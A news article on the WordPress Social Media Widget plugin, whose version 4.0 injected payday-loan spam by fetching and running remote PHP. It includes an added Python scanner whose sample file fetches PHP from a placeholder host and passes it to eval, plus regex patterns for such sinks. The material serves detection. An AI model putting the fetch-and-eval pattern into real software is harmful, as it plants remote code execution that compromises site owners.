Researchers at Sucuri have found that version 4.0 of the WordPress Social Media Widget, also referred to as social-media-widget, has been injecting spam advertisements into sites. It is recommended that anyone using the widget, which has over 900,000 users, remove or disable it as soon as possible. The researchers believe the malicious code, which added “Pay Day Loan” spam into sites which ran the plugin, was added at the end of March when the developers released version 4.0 to the WordPress.org plugin repository.
The plugin, which changed maintainers in January, had already been noticed behaving oddly a month ago, but the malware in version 4.0 was more obvious, reading and executing a PHP script from a third-party site; the spam injection code was even tidied up to make it more compact. A 4.0.1 version of the plugin then appeared without the malware code, but the WordPress.org maintainers were having none of it – they said that they had removed the widget from the repository and pushed an update to users of the widget to remove it from their systems. Their advice to users is to find another plugin to replace social-media-widget, though they also say they will work with the plugin maintainer to “ensure that everything is good, all problems are solved, all i’s dotted and all t’s crossed”. Until then, the plugin will remain offline.
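One defender-side check that follows from this incident, as an added example that is neither Sucuri's tooling nor the plugin's code: a small Python scanner that flags PHP files which fetch content from a remote URL and hand it to an execution sink (the behaviour described above). The sample files, host names and file names are constructed for the example, not taken from the real plugin.

```python
import re
from pathlib import Path

# Constructed samples (not the actual plugin): a benign widget file and one
# that reads PHP from a third-party host and executes it.
SAMPLES = {
    "widget.php": "<?php\nfunction smw_render() { echo '<div class=\"smw\"></div>'; }\n",
    "inject.php": (
        "<?php\n$p = file_get_contents('http://ads.example.invalid/payload.txt');\n"
        "eval($p);\n"
    ),
}

# Indicators a reviewer checks for in plugin code: a literal remote URL passed
# to a fetch function, a remote include/require, and dynamic code execution
# (eval/assert/create_function, or preg_replace with the /e modifier).
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|fopen|curl_init|wp_remote_get)\s*\(\s*['\"]https?://", re.I)
REMOTE_INCLUDE = re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I)
DYNAMIC_EXEC = re.compile(
    r"\b(eval|assert|create_function)\s*\(|preg_replace\s*\(\s*['\"](.)[^'\"]*\2[a-z]*e['\"]", re.I)

def scan_php_source(text):
    """Return (indicator, line_number) hits for one PHP source string."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pattern in (("remote_fetch", REMOTE_FETCH),
                              ("remote_include", REMOTE_INCLUDE),
                              ("dynamic_exec", DYNAMIC_EXEC)):
            if pattern.search(line):
                hits.append((name, no))
    return hits

def severity(hits):
    """'high' when remote content can reach execution, 'medium' for a lone indicator."""
    kinds = {k for k, _ in hits}
    if "remote_include" in kinds or {"remote_fetch", "dynamic_exec"} <= kinds:
        return "high"
    return "medium" if kinds else "clean"

def scan_plugin_dir(root):
    """Scan every .php file below a plugin directory: {relative path: (severity, hits)}."""
    root = Path(root)
    report = {}
    for path in root.rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="replace"))
        report[str(path.relative_to(root))] = (severity(hits), hits)
    return report

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        hits = scan_php_source(src)
        print(name, severity(hits), hits)
```

Point `scan_plugin_dir` at `wp-content/plugins/<plugin>` to triage an installed copy; a "high" result is a lead for manual review, not a verdict, since the regexes are deliberately simple.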
It is unclear how the code was added to the plugin; Sucuri notes that the changes are being made to the core of the plugin and suggests that “either it’s the author, or his credentials are compromised”. They also raise concerns about the repository’s processes, although the team resolved the issue quickly; they wonder if this is a new attack vector in the making and what can be done to prevent it from being exploited.